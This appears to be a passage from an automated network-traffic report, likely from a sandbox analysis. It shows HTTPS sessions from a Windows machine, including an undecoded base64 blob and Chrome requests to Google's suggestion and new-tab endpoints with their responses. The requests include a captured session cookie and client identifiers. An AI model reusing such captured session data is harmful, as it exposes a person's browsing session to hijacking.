5+M7sNgdp9pyH6vr2d30+vcoXHVpzZ7C9qQbHl6q14LU7S6h3VucxnEPpufQl+i15GFccS6WzIS37R8JH/ubptb2JbCbQNjVMQ6spo3d777hbFx1L5DYyfiiGRFQp9CG1+UmpdZbhMZ6Bqzv2ZCr+q5vQzlx1e/J96MfBx+8lZaR4yfggx+XwH4Kr+XWnOGm/GRScSyZ1cr/vx4eVqDYhtbsJ6rYWNaCMQ64po3dyKP+ZRtmZ4yew/XtQFFXrtO
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 71 6e 66 56 35 58 4d 64 51 32 6e 34 39 61 52 34 4c 50 74 5a 31 39 77 4a 35 7a 52 68 4c 66 74 48 77 6b 66 2b 35 75 75 79 75 63 6e 72 5a 74 41 32 4e 55 78 44 71 79 6d 6a 64 33 6e 75 75 74 6f 55 58 38 74 6b 4e 6a 4f 2f 4b 30 54 45 6c 43 6e 33 59 76 65 35 43 43 70 32 6c 6d 54 78 6e 6f 50 72 65 58 54 6d 36 76 36 72 6d 39 44 4f 58 48 56 2f 74 2f 30 6f 52 39 52 51 4f 33 43 7a 39 62 6f 61 2f 69 62 56 4a 72 49 64 67 6d 74 35 64 32 59 37 37 37 72 61 46 4e 72 49 5a 58 5a 31 75 75 74 45 52 52 54 6f 4e 75 4c 31 2b 30 74 6f 39 38 66 32 49 78 32 45 65 43 2b 6c 62 44 6e 73 38 64 76 51 44 6b 32 32 38 65 45 2f 71 46 59 53 52 2b 69 30 49 58 65 36 53 69 6d 32 46 53 54 78 6e 41 4f 71 4f 76 48 6e 75 53 37 36 6d 68 55 66 79 2b 55 30 63 4c 2b 70 42 6b 5a 57 4f 4f 56 7a 39 62 38 Data Ascii: qnfV5XMdQ2n49aR4LPtZ19wJ5zRhLftHwkf+5uuyucnrZtA2NUxDqymjd3nuutoUX8tkNjO/K0TElCn3Yve5CCp2lmTxnoPreXTm6v6rm9DOXHV/t/0oR9RQO3Cz9boa/ibVJrIdgmt5d2Y777raFNrIZXZ1uutERRToNuL1+0to98f2Ix2EeC+lbDns8dvQDk228eE/qFYSR+i0IXe6Sim2FSTxnAOqOvHnuS76mhUfy+U0cL+pBkZWOOVz9b8
2024-11-07 16:55:15 UTC	368	IN	Data Raw: 57 62 79 6d 59 59 37 50 50 57 6b 2b 57 7a 2b 43 67 56 4f 53 62 56 68 76 32 35 35 56 67 75 45 65 50 44 7a 34 6d 6b 48 71 50 56 55 5a 48 61 59 45 53 48 2f 4e 69 62 2f 4b 57 75 4a 68 74 2f 61 63 32 4f 69 72 6d 70 43 56 45 48 38 34 6e 55 68 4c 64 38 38 49 6c 41 32 4e 55 78 48 2b 43 2b 68 39 4f 72 70 71 34 77 47 7a 34 71 68 38 7a 43 2b 72 73 62 56 6d 47 64 39 59 6a 58 34 53 79 77 6d 58 47 64 32 48 5a 4a 37 71 62 61 33 62 4f 4e 72 69 41 62 52 6d 66 56 78 6f 53 68 37 53 30 53 55 61 33 63 6d 63 43 70 42 61 66 64 57 70 48 63 4d 79 65 72 38 74 4c 64 70 66 54 6f 4b 41 4d 70 5a 39 58 61 31 62 6e 31 53 45 4d 45 39 6f 6a 59 67 62 59 30 37 73 49 66 67 49 77 70 57 2b 36 6d 78 39 32 7a 39 4b 6c 72 53 57 73 76 6c 73 6a 48 76 70 4d 6d 45 6b 6d 75 31 49 54 51 32 68 57 4f 31 Data Ascii: WbymYY7PPWk+Wz+CgVOSbVhv255VguEePDz4mkHqPVUZHaYESH/Nib/KWuJht/ac2OirmpCVEH84nUhLd88IlA2NUxH+C+h9Orpq4wGz4qh8zC+rsbVmGd9YjX4SywmXGd2HZJ7qba3bONriAbRmfVxoSh7S0SUa3cmcCpBafdWpHcMyer8tLdpfToKAMpZ9Xa1bn1SEME9ojYgbY07sIfgIwpW+6mx92z9KlrSWsvlsjHvpMmEkmu1ITQ2hWO1
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 32 35 35 34 0d 0a 75 66 56 59 56 6c 47 75 32 6f 7a 66 35 7a 6d 79 33 56 79 41 7a 7a 59 33 6e 73 66 59 6c 75 65 35 34 57 4e 6c 52 77 69 59 31 63 6a 30 6f 68 4d 76 59 62 62 59 67 64 2f 6a 50 62 47 62 45 64 62 44 4d 56 47 5a 70 70 33 64 31 50 71 75 63 42 73 68 61 61 44 64 79 76 65 71 44 67 41 53 67 74 61 45 33 65 6b 6b 71 35 73 52 31 73 6f 78 55 66 43 6f 6c 5a 6e 36 39 4c 59 34 43 53 4a 38 78 6f 6d 55 71 37 4a 57 43 42 2b 31 6d 39 65 44 71 6d 75 79 6d 77 66 57 69 33 49 62 73 75 44 57 69 2b 6a 7a 30 46 5a 34 62 6a 2b 66 78 59 62 66 71 67 6b 59 53 61 37 4a 73 65 2f 4b 4a 71 48 59 55 64 54 39 5a 77 53 77 35 64 43 61 31 59 72 67 62 30 39 2b 4a 35 50 65 68 4c 66 74 46 31 45 48 6d 70 76 48 6b 64 74 6c 34 4d 4d 66 7a 6f 78 45 43 71 37 6f 30 6f 76 36 2b 63 31 2f 54 Data Ascii: 2554ufVYVlGu2ozf5zmy3VyAzzY3nsfYlue54WNlRwiY1cj0ohMvYbbYgd/jPbGbEdbDMVGZpp3d1PqucBshaaDdyveqDgASgtaE3ekkq5sR1soxUfColZn69LY4CSJ8xomUq7JWCB+1m9eDqmuymwfWi3IbsuDWi+jz0FZ4bj+fxYbfqgkYSa7Jse/KJqHYUdT9ZwSw5dCa1Yrgb09+J5PehLftF1EHmpvHkdtl4MMfzoxECq7o0ov6+c1/T
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 67 30 66 71 6a 46 68 5a 4a 73 70 76 42 6b 65 74 72 2b 4f 49 66 33 6f 42 33 43 72 61 6d 36 74 4f 72 72 4b 34 77 47 30 77 71 6d 39 44 44 37 37 78 56 4e 31 79 79 30 61 37 63 39 43 7a 67 6c 52 2b 51 6a 43 6c 61 37 71 62 52 6a 4b 76 73 76 6a 6f 41 4c 48 72 43 6a 70 62 6d 34 77 46 52 53 65 4f 44 33 5a 2b 6b 4f 65 43 44 48 39 48 50 59 78 75 6d 35 63 4f 65 72 49 72 51 58 56 68 33 4a 35 4c 49 38 66 71 38 47 78 46 55 6e 65 57 75 33 2b 38 73 72 4d 31 68 71 50 6c 79 42 36 37 68 77 34 79 72 2b 71 35 6e 47 79 45 51 31 5a 61 45 78 75 4e 59 43 52 2f 37 6d 37 72 53 36 69 57 6e 7a 55 37 62 2b 58 49 59 6f 2b 62 65 33 61 58 30 36 43 67 44 4b 32 66 56 32 74 57 35 39 55 68 44 42 50 61 49 32 49 47 32 4e 4f 37 43 48 34 43 4d 4b 56 76 75 70 73 66 64 73 2f 53 70 61 30 6c 72 4c 35 Data Ascii: g0fqjFhZJspvBketr+OIf3oB3Cram6tOrrK4wG0wqm9DD77xVN1yy0a7c9CzglR+QjCla7qbRjKvsvjoALHrCjpbm4wFRSeOD3Z+kOeCDH9HPYxum5cOerIrQXVh3J5LI8fq8GxFUneWu3+8srM1hqPlyB67hw4yr+q5nGyEQ1ZaExuNYCR/7m7rS6iWnzU7b+XIYo+be3aX06CgDK2fV2tW59UhDBPaI2IG2NO7CH4CMKVvupsfds/Spa0lrL5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49716	142.251.35.164	443	1664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:20 UTC	807	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-07 16:55:20 UTC	1266	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:20 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ggJHXeGiBKEwD4z76IDClw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 16:55:20 UTC	822	IN	Data Raw: 33 32 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 64 65 6c 74 61 20 66 6c 69 67 68 74 20 61 74 6c 61 6e 74 61 22 2c 22 62 75 66 66 61 6c 6f 20 62 69 6c 6c 73 20 6b 65 6f 6e 20 63 6f 6c 65 6d 61 6e 20 69 6e 6a 75 72 79 22 2c 22 64 65 61 6c 73 20 62 6c 61 63 6b 20 66 72 69 64 61 79 22 2c 22 63 68 69 63 61 67 6f 20 70 64 20 73 65 61 73 6f 6e 20 31 32 22 2c 22 73 70 61 63 65 78 20 6c 61 75 6e 63 68 22 2c 22 64 65 6e 76 65 72 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 74 6f 74 61 6c 73 22 2c 22 77 61 72 72 69 6f 72 73 20 76 73 20 63 65 6c 74 69 63 73 20 6e 62 61 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 77 69 6e 6e 69 6e 67 20 6e 75 6d 62 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 Data Ascii: 32f)]}'["",["delta flight atlanta","buffalo bills keon coleman injury","deals black friday","chicago pd season 12","spacex launch","denver weather forecast snow totals","warriors vs celtics nba","mega millions winning numbers"],["","","","","","","",""
2024-11-07 16:55:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49717	142.251.35.164	443	1664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:20 UTC	710	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-07 16:55:20 UTC	1042	IN	HTTP/1.1 200 OK Version: 691321546 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 07 Nov 2024 16:55:20 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 16:55:20 UTC	213	IN	Data Raw: 32 39 32 65 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 Data Ascii: 292e)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 50 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 6b 64 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 Data Ascii: 003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\"
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 64 20 67 62 5f 36 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 Data Ascii: v class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nd gb_6d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u0
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 6d 61 67 65 73 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 52 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 32 63 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 20 67 62 5f 5a 20 67 62 5f 48 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 41 5c 22 20 Data Ascii: mages\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Re\"\u003e\u003cdiv class\u003d\"gb_2c\"\u003e \u003cdiv class\u003d\"gb_bd gb_Z gb_H\"\u003e \u003cdiv class\u003d\"gb_C\"\u003e \u003ca class\u003d\"gb_A\"
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 41 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 20 61 70 70 73 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 5c 75 30 30 33 64 72 68 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c Data Ascii: 3e\u003ca class\u003d\"gb_A\" aria-label\u003d\"Google apps\" href\u003d\"https://www.google.com/intl/en/about/products?tab\u003drh\" aria-expanded\u003d\"false\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg class\u003d\"gb_E\" focusable\u003d\
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 Data Ascii: u003c\/div\u003e\u003c\/header\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" h
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 49 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 Data Ascii: safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\n_.Id\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Id(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u0
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 5b 51 64 28 5c 22 64 61 74 61 5c 22 29 2c 51 64 28 5c 22 68 74 74 70 5c 22 29 2c 51 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 51 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 51 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 50 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 Data Ascii: {return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003d[Qd(\"data\"),Qd(\"http\"),Qd(\"https\"),Qd(\"mailto\"),Qd(\"ftp\"),new _.Pd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.Vd\u003dclas
2024-11-07 16:55:20 UTC	1255	IN	Data Raw: 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c Data Ascii: ;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|
2024-11-07 16:55:20 UTC	297	IN	Data Raw: 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 Data Ascii: ySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49718	142.251.35.164	443	1664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
